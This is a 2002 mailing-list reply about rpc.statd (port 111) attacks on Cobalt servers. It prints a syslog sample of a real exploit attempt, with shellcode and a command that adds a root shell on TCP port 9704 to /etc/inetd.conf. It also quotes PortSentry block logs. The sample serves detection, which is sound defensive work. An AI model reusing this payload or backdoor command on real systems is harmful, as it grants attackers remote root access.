[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] Port 111 Attack
- Subject: RE: [cobalt-users] Port 111 Attack
- From: "John Adair" <J.Adair@xxxxxxxxxxxxxxxx>
- Date: Wed Jan 9 09:48:21 2002
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hello,
There were a few vulnerabilities found in the rpc.statd daemon. This
vulnerability was used by some worms to use an automated process of rooting
Linux based machines. Your syslog should display the following if you were
indeed attacked (not just scanned) -
<syslog>
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F
^F^G^G08049f10
bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f
20656d61 746e6f63 696e6961 2720676e 203a272f
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
00000000000000000000000000000000000000000000000000000000000000000000000000bf
fff7
0400000000000000000000000000000000000000000000000bffff7050000bffff7060000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v
<83> <8D>^(<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
</syslog>
Notice how the shellcode creates a backdoor on TCP 9704. This specific
exploit code only targets x86 based architectures.
http://www.cert.org/advisories/CA-2000-17.html
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0018
> -----Original Message-----
> From: cobalt-users-admin@xxxxxxxxxxxxxxx
> [mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Sim Ayers
> Sent: Tuesday, January 08, 2002 10:58 AM
> To: cobalt-users@xxxxxxxxxxxxxxx
> Subject: [cobalt-users] Port 111 Attack
>
>
> I finally got around to installing PortSentry last week and because of
> PortSentry
> being installed on our RQ4 the Port 111 Attack was caught and
> taken careof.
>
> Output from LogCheck and portsentry
>
> Active System Attack Alerts
> =-=-=-=-=-=-=-=-=-=-=-=-=-=
> Jan 7 22:37:53 admin portsentry[24275]: attackalert: Connect
> from host:
> quantum2.edurus.com/208.131.42.26 to TCP port: 111
> Jan 7 22:37:53 admin portsentry[24275]: attackalert: Host
> 208.131.42.26 has
> been blocked via wrappers with string: "ALL: 208.131.42.26"
> Jan 7 22:37:53 admin portsentry[24275]: attackalert: Host
> 208.131.42.26 has
> been blocked via dropped route using command: "/sbin/route add -host
> 208.131.42.26 reject">
>
>
> To anyone on the list who hasn't installed PortSentry
>
> Installing SSH2, IPChains, Portsentry, Logcheck, Tripwire, Chkrootkit,
> Lionfind, Whois, lcap
>
> http://list.cobalt.com/pipermail/cobalt-users/2001-April/042023.html
>
> Some on the install instruction from that page that do not
> work are only
> because
> of newer versions avaibale. If wget fails then check for a
> newer version.
>
>
> More info on Port 111 (rpc.statd)
>
> http://www1.dshield.org/ports/port111.html
>
>
> One happy puppy,
> Sim
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>